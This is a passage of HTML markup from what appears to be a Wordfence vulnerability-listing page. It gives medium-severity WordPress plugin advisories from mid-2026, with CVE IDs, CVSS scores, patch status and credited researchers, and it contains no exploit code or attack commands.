						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15248" target="_blank" rel="noopener noreferrer">							CVE-2026-15248						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 2, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/meta-box" target="_blank" rel="noopener">Meta Box</a> <span class="wfvr-software-slug">[meta-box]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/simon-tran" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/cc05188d72326fd7f2aa86218d233560.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cc05188d72326fd7f2aa86218d233560"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/simon-tran" target="_blank" rel="noopener">Simon Tran</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1b3610f3-d589-4a45-9f80-6b66205de093" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/95d9995a-d99e-4136-84f9-1d3dfc4a4bf0" target="_blank" rel="noopener">myCred &lt;= 3.1.2 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61968" target="_blank" rel="noopener noreferrer">							CVE-2026-61968						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mycred" target="_blank" rel="noopener">Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program – myCred</a> <span class="wfvr-software-slug">[mycred]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/riyas-m-s" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f36c6f9e5c03ad8f37eb6faab59d90d8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f36c6f9e5c03ad8f37eb6faab59d90d8"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/riyas-m-s" target="_blank" rel="noopener">Riyas M S</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/95d9995a-d99e-4136-84f9-1d3dfc4a4bf0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/42f8f378-0f84-49ad-b95e-6abb3a94df7e" target="_blank" rel="noopener">Podlove Podcast Publisher &lt; 4.5.3 &#8211; Cross-Site Request Forgery</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13729" target="_blank" rel="noopener noreferrer">							CVE-2026-13729						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/podlove-podcasting-plugin-for-wordpress" target="_blank" rel="noopener">Podlove Podcast Publisher</a> <span class="wfvr-software-slug">[podlove-podcasting-plugin-for-wordpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ryanthe" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c4d4f022dc9a23568fb89d3b328e6cb2.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c4d4f022dc9a23568fb89d3b328e6cb2"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ryanthe" target="_blank" rel="noopener">Ryan Fabella</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/42f8f378-0f84-49ad-b95e-6abb3a94df7e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/551272a2-6c2b-45b8-b2e5-330396c5680a" target="_blank" rel="noopener">ProfileGrid – User Profiles, Groups and Communities &lt; 5.9.9.8 &#8211; Authenticated (Subscriber+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16291" target="_blank" rel="noopener noreferrer">							CVE-2026-16291						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 2, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/profilegrid-user-profiles-groups-and-communities" target="_blank" rel="noopener">ProfileGrid – User Profiles, Groups and Communities</a> <span class="wfvr-software-slug">[profilegrid-user-profiles-groups-and-communities]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/meher-sudhakar-abbireddi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9ce567c2aebe49665baff705399d2e66.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9ce567c2aebe49665baff705399d2e66"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/meher-sudhakar-abbireddi" target="_blank" rel="noopener">Meher Sudhakar Abbireddi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/551272a2-6c2b-45b8-b2e5-330396c5680a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/16187b39-9b3a-4b1c-806c-37b62483a719" target="_blank" rel="noopener">RealHomes Memberships &lt;= 3.0.9 &#8211; Missing Authorization to Authenticated (Subscriber+) Membership Payment Bypass via &#8216;ims_add_paypal_recurring_membership&#8217; AJAX Action</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-10782" target="_blank" rel="noopener noreferrer">							CVE-2026-10782						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/inspiry-memberships" target="_blank" rel="noopener">RealHomes Memberships</a> <span class="wfvr-software-slug">[inspiry-memberships]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yong-jin-lim" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/85f293dee3eecb01177cc42abdc331b1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="85f293dee3eecb01177cc42abdc331b1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yong-jin-lim" target="_blank" rel="noopener">dyingman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/16187b39-9b3a-4b1c-806c-37b62483a719" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/955d2b8d-af39-43f9-a513-7cc421cbd4b5" target="_blank" rel="noopener">RT Mega Menu – Mega Menu Builder for Elementor &amp; Gutenberg &lt;= 1.5.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65433" target="_blank" rel="noopener noreferrer">							CVE-2026-65433						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rt-mega-menu" target="_blank" rel="noopener">RT Mega Menu – Mega Menu Builder for Elementor &amp; Gutenberg</a> <span class="wfvr-software-slug">[rt-mega-menu]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc" target="_blank" rel="noopener">luc</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/955d2b8d-af39-43f9-a513-7cc421cbd4b5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cfa8aaf8-10c8-4024-8223-6218963012d2" target="_blank" rel="noopener">Search Atlas SEO – Premier SEO Plugin for One-Click WP Publishing &amp; Integrated AI Optimization &lt; 2.6.12 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15252" target="_blank" rel="noopener noreferrer">							CVE-2026-15252						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/metasync" target="_blank" rel="noopener">Search Atlas SEO – Premier SEO Plugin for One-Click WP Publishing &amp; Integrated AI Optimization</a> <span class="wfvr-software-slug">[metasync]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/levinitycyber" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0203e07dd2cfa312f294f9391bdec1e8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0203e07dd2cfa312f294f9391bdec1e8"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/levinitycyber" target="_blank" rel="noopener">LevinityCyber</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cfa8aaf8-10c8-4024-8223-6218963012d2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/75d5c684-090e-4fff-9bf7-2b7c41ef95d3" target="_blank" rel="noopener">ShopLentor &lt;= 3.4.5 &#8211; Insecure Direct Object Reference to Authenticated (Contributor+) Sensitive Information Exposure via &#8216;optionSection&#8217; Parameter</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16797" target="_blank" rel="noopener noreferrer">							CVE-2026-16797						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woolentor-addons" target="_blank" rel="noopener">ShopLentor – All-in-One WooCommerce Growth &amp; Store Enhancement Plugin</a> <span class="wfvr-software-slug">[woolentor-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/75d5c684-090e-4fff-9bf7-2b7c41ef95d3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f5a7aa18-b6a9-4cd1-a502-25c0888ac227" target="_blank" rel="noopener">ShopLentor Pro &lt;= 2.8.5 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61973" target="_blank" rel="noopener noreferrer">							CVE-2026-61973						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woolentor-addons-pro" target="_blank" rel="noopener">ShopLentor Pro</a> <span class="wfvr-software-slug">[woolentor-addons-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f5a7aa18-b6a9-4cd1-a502-25c0888ac227" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e98d4f04-74cd-486f-bb2f-fad76895f386" target="_blank" rel="noopener">Survey Form Block &lt;= 1.0.1 &#8211; Missing Authorization to Authenticated (Subscriber+) Survey Submission Data Export</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-5626" target="_blank" rel="noopener noreferrer">							CVE-2026-5626						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/survey-form-block" target="_blank" rel="noopener">Survey Form Block – collect answers and insights from your audience</a> <span class="wfvr-software-slug">[survey-form-block]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/048e7871de77533583773e0172b337bc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="048e7871de77533583773e0172b337bc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener">Itthidej Aramsri (Boeing777)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e98d4f04-74cd-486f-bb2f-fad76895f386" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bea4b2c6-f078-4b47-b4d3-16216a54c0ab" target="_blank" rel="noopener">Sync Post With Other Site &lt; 1.9.3 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14923" target="_blank" rel="noopener noreferrer">							CVE-2026-14923						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sync-post-with-other-site" target="_blank" rel="noopener">Sync Post With Other Site</a> <span class="wfvr-software-slug">[sync-post-with-other-site]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ead6eac6aef4e9f4e2d49ef7f41d9316.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ead6eac6aef4e9f4e2d49ef7f41d9316"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener">Shikhali Jamalzade</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bea4b2c6-f078-4b47-b4d3-16216a54c0ab" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1dd4e39a-9b2f-4728-b026-2dee60257c46" target="_blank" rel="noopener">Theme Editor &lt;= 3.1 &#8211; Cross-Site Request Forgery to CSS Modification</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2025-14469" target="_blank" rel="noopener noreferrer">							CVE-2025-14469						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/theme-editor" target="_blank" rel="noopener">Theme Editor</a> <span class="wfvr-software-slug">[theme-editor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1dd4e39a-9b2f-4728-b026-2dee60257c46" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b75789ff-6050-4044-a3ff-d071591b4ec6" target="_blank" rel="noopener">Tutor LMS – eLearning and online course solution &lt; 4.0.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14310" target="_blank" rel="noopener noreferrer">							CVE-2026-14310						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor" target="_blank" rel="noopener">Tutor LMS – eLearning and online course solution</a> <span class="wfvr-software-slug">[tutor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sanjar-tulkinov" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d4ffc641ce84aa2161a00a010cfc1d18.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d4ffc641ce84aa2161a00a010cfc1d18"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sanjar-tulkinov" target="_blank" rel="noopener">Sanjar Tulkinov</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b75789ff-6050-4044-a3ff-d071591b4ec6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/50ac89bd-43fc-4b21-8d29-b320d7aa587b" target="_blank" rel="noopener">User Profile Picture &lt;= 2.6.3 &#8211; Authenticated (Author+) Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61971" target="_blank" rel="noopener noreferrer">							CVE-2026-61971						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/metronet-profile-picture" target="_blank" rel="noopener">User Profile Picture</a> <span class="wfvr-software-slug">[metronet-profile-picture]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/50ac89bd-43fc-4b21-8d29-b320d7aa587b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5d386d25-d228-4491-b58d-6adbb3b863a5" target="_blank" rel="noopener">Vimeo &lt;= 1.2.2 &#8211; Authenticated (Subscriber+) Information Exposure</a></h4>
<div class="cvss-score-badge">4.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>4.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
